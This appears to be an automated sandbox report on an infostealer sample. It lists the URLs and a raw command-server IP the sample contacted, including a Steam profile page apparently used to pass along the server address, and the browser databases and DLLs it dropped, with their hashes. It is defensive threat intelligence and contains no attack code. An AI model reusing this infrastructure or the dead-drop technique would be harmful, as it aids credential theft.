                                                                                                                                            https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=yXrh2LzpDwct&l=eRegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://65.109.242.112/pRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchEBAFBG.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.2175331068.000000001B68D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199681720597[1].htm.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoEBAFBG.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://65.109.242.112JDGRegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  low
                                                                                                                                                                  https://store.steampowered.com/76561199681720597[1].htm.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://65.109.242.112/#RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • 12%, Virustotal, Browse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLhRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://ac.ecosia.org/autocomplete?q=EBAFBG.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000002.00000002.2171023727.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp, GHCGDA.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishRegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp, 76561199681720597[1].htm.2.drfalse
                                                                                                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
23.195.238.96 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
65.109.242.112 | unknown | United States | 11022 | ALABANZA-BALTUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1440170
Start date and time: 2024-05-12 12:46:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/25@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 92
• Number of non-executed functions: 201
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Time      Type             Description
12:47:01  API Interceptor  1x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        2R78NbtrsM.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.195.238.96
                                                                                                                                                                                                                        europefridayedatingloverforchildern.jpg.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • 23.195.238.96
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):5242880
Entropy (8bit):0.037963276276857943
Encrypted:false
Malicious:false
Reputation:high, very likely benign file
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:data
Category:dropped
Size (bytes):32768
Entropy (8bit):0.017262956703125623
Encrypted:false
Malicious:false
Reputation:high, very likely benign file
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
Malicious:false
Reputation:high, very likely benign file
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
Malicious:false
Reputation:high, very likely benign file
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9571
                                                                                                                                                                                                                                                                Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                • Filename: 1WQoGZnpTG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: Mh578aJbfT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: ouTBFyJGN3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: WS89wB6DGK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: 0d4n5OS22R.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: TCBNakHd95.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: v5jT7owmfn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: rI4M7XBuY3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                • Filename: 1WQoGZnpTG.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: Mh578aJbfT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: ouTBFyJGN3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: WS89wB6DGK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: 0d4n5OS22R.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: TCBNakHd95.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: v5jT7owmfn.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                • Filename: rI4M7XBuY3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, Author: Joe Security
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):34771
                                                                                                                                                                                                                                                                Entropy (8bit):5.3843653404896905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Edpqm+0Ih3YAA9CWGIWfcDAoPzzgiJmDzJtxvrfJkPVoEAdmPzzgiJmDzJtxvJ28:Ed8m+0Ih3YAA9CWGIWFoPzzgiJmDzJt/
                                                                                                                                                                                                                                                                MD5:B8719A1861962262D390617FEC83C72E
                                                                                                                                                                                                                                                                SHA1:1CAFE529AF3EE421C5A478F3404C4748D6D95C4D
                                                                                                                                                                                                                                                                SHA-256:A762A4EB54C1E217B0466FCB48B569E5928F0DB2C4E09B07207908EF49F3DA7C
                                                                                                                                                                                                                                                                SHA-512:D746C3AAC9045C6EE0D63C4FA24D0B2690992472F0A98A1BF9405919E5A3F6C3EF19AB1DF75472BA6CCCD88325ADCFF8C75E3DA0C4CB33920FE630850629CCB3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: p5.r https://65.109.242.112|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2459136
                                                                                                                                                                                                                                                                Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                                                MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                                                SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                                                SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                                                SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 1%
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
